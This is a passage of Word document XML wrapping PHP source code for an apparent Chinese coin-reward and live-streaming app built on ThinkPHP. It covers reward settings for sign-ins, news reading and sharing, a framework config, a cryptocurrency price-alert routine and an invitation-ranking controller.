        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3FF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nwu' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>签到领金币、开宝箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FB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ihuan' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒赚金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>倍</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70892A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yaoqing' =&gt; '0.50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59309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yaoqing_s1' =&gt; '0.30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B01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yaoqing' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7794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yaoqing_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58883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login' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6A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login_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1544F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login' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241BC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login_s1' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF3C9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news_num' =&gt; '5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972F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news_time' =&gt; 10000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF4C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news' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C537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news_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ACC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news' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789790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jinbi_news_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699379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weitoutiao' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AED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weitoutiao_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CEB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weitoutiao' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB89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weitoutiao_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E6F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fenxiang_1' =&gt; '0.20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48164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fenxiang_1_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964A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fenxiang_1' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB7B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fenxiang_1_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7C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fenxiang_2' =&gt; '0.20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2D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fenxiang_2_s1' =&gt; '0.20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFFD2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fenxiang_2' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D71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fenxiang_2_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377C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jindu_time' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF5F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jindu_num' =&gt; '200',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E02C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jindu_2' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25A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jindu_2_s1' =&gt; '5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A53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C40F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73052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liwu_title' =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>钻石</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29062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content' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请选择合适自己的分类，精准的分类可以获得更多的展示机会。如果选择不正确的分类，将影响您后续直播间的展示机会</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D532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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>欢迎来到直播间！速翔网络倡导绿色健康直播，不提倡未成年人进行充值。直播内容和评论严禁包含政治、低俗、色情等内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6F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put_text'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跟大家聊聊呗</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509A5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B545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return [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1129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namespace'          =&gt; 'app',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D8A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debug'              =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3239C8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trace'              =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD9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status'             =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03667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_multi_module'       =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C828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o_bind_module'       =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D64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t_namespace'         =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13974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_file_list'        =&gt; [THINK_PATH . 'helper' . EXT],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC823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return_type'    =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15076E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ajax_return'    =&gt; 'json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D8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jsonp_handler'  =&gt; 'jsonpReturn',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ECEB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jsonp_handler'      =&gt; 'callback',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D0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timezone'       =&gt; 'PRC',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56632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ng_switch_on'         =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC8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filter'         =&gt; 'htmlspecialchars',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4B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lang'           =&gt; 'zh-cn',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98C2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ass_suffix'           =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A5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roller_suffix'      =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF2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module'         =&gt; 'index',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B59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ny_module_list'       =&gt; ['common'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5D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controller'     =&gt; 'Index',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C338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action'         =&gt; 'index',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9196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_validate'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F508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pty_controller'       =&gt; 'Error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059F3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ction_suffix'          =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC1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roller_auto_search' =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D020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pathinfo'           =&gt; 's',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0112C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info_fetch'         =&gt; ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487411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info_depr'          =&gt; '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E00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html_suffix'        =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB42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common_param'       =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6E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param_type'         =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6059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route_on'           =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074734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ute_config_file'      =&gt; ['route'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B60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route_must'         =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A3C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domain_deploy'      =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C36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domain_root'        =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524EFD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convert'            =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B71B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_controller_layer'   =&gt; 'controller',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15071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method'             =&gt; '_method',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBD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mplate'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B471B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hink',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F30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path'    =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A36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suffix'  =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9B3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depr'    =&gt; DS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36918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pl_begin'    =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731F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pl_end'      =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D6C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begin' =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014CD4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end'   =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B92FC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lib_pre_load'     =&gt;    'app\common\taglib\Fx', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB22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B68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ew_replace_str'       =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5193D6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spatch_success_tmpl'  =&gt; THINK_PATH . 'tpl' . DS . 'dispatch_jump.tpl',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB4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spatch_error_tmpl'    =&gt; THINK_PATH . 'tpl' . DS . 'dispatch_jump.tpl',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970E9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eption_tmpl'         =&gt; THINK_PATH . 'tpl' . DS . 'think_exception.tpl',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD84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or_message'          =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请联系</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>技术：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1424445608',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091A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w_error_msg'         =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD36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eption_handle'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73001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g'                    =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655E7F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File',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755AC1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  =&gt; LOG_PATH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C04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evel' =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B80C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B9B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ace'                  =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66552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Html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D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E79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ql_explain'    =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61427B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che'                  =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B40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File',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2896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   =&gt; CACHE_PATH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632066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fix' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0694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ire' =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306AA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CA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ssion'                =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDE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var_session_id' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFD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fix'         =&gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE2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o_start'     =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286516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B8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okie'                 =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B84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fix'    =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35D0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ire'    =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47830D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h'      =&gt; '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F4C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gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F366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ure'    =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5F9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only'  =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0BD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cookie' =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC932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56C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inate'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70C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bootstrap',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052247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page'  =&gt; 'page',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FE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rows' =&gt; 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DE5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A13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ptcha'  =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A43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Set'  =&gt; '0123456789',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D087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ntSize' =&gt; 18, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932F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Curve' =&gt; false, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52860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H'   =&gt; 30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BECC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W'   =&gt; 120, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B8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ength'   =&gt; 3, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB25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et'    =&gt; true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A91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054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07D7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99B0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behavior;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D0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1D34F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ctionLog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151EE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D89C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B94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name</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根据交易所最新币种报价匹配用户关注的提醒价格以及对应用户的消息提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F53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by Xh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64A1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9D9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un($batch_no){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00F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Data = Db::name('ticker')-&gt;field('exchange,symbol,last_price as price')-&gt;where(['batch_no'=&gt;$batch_no])-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF668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symbolData)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A9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symbolData as $key=&gt;$data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B7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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB23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ceData = '0.05';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5323C4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exchange'])&amp;&amp; !empty($data['symbol']) &amp;&amp;!empty($data['price'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D2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data['exchange'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF8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data['symbol'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C458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ce = $data['price'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039438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at = sprintf("%.2f",($price - ($price*$priceData)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68353D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nd = sprintf("%.2f",($price + ($price*$priceData)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D978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exchange'] = ['=',$exchange];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C6B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mbol'] = ['=',$symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA6E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rice'] = ['between',[$strat,$end]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF7CA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andle'] = ['=',0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D5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Data = explode('/',$symbol);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D582F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 = $coinData[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A0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 = Db::name('symbol_alert')-&gt;field('id,member_id,exchange,symbol')-&gt;where($where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114E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serData){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43B7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userData as $key=&gt;$val){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA24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Db::name('symbol_alert')-&gt;where(['id'=&gt;$val['id']])-&gt;update(['handle'=&gt;1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44748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价格提醒</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A543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 = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315F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gt;4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C349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ipient_id'=&gt;$val['member_id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E885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gt;$val['exchange'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6935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gt;$val['symbol'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D6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_name'=&gt;$coin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E471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content,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79109B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ad'=&gt;0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D277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gt;time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F050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31E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Db::name('message')-&gt;insert($message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6F4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DF4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F68B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582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92B4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32DE1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264B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21A41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45E6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24AAD3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48871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Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C09D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Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571E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0D575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6B0960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Yaoqing extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6C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2CE8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member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDD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56266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1ACAF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quest::instance()-&gt;isMobile()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780EF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禁止操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F96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A5EB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name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A57C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54FF3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 || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB8F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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE9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3A8B8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Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD61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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E638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aaa){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5FE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tokenaaa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B4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78C6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token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF8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6A40B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5492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74D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decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A71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756E1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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2E4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0D675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867F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user($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB1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3A7CB7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5D8A9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27E40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719D5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3C77C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59F69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256E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6819CB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0A2C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FFF1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3715E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5FA11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41D06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72377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2C12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39C472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071D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B6DDB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709AE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账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02106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4ABBA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审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B820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EA0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5D142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90FB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B4AC6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A44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FF848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不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13030F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76CE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6E4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member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8930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79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ongbang(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60682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 ? input('type/d') : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A87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type==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB66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s1']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C7D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b.create_time desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A2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56EC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a.money_num desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75634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B1F1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b.hide']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74839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gt;alias('a')-&gt;join('__MEMBER__ b','a.uid = b.id')-&gt;where($where)-&gt;order($order)-&gt;field('b.id,b.nickname,b.mobile,a.money_num,a.tudi_num,b.create_time')-&gt;paginate(10)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768716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378A3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nput('page');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C19E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ages&gt;10){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6A4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tal']=100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A3A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45184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DF9B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5A24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data']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64299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2B5A1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_username($v);</w:t>
      </w:r>
    </w:p>
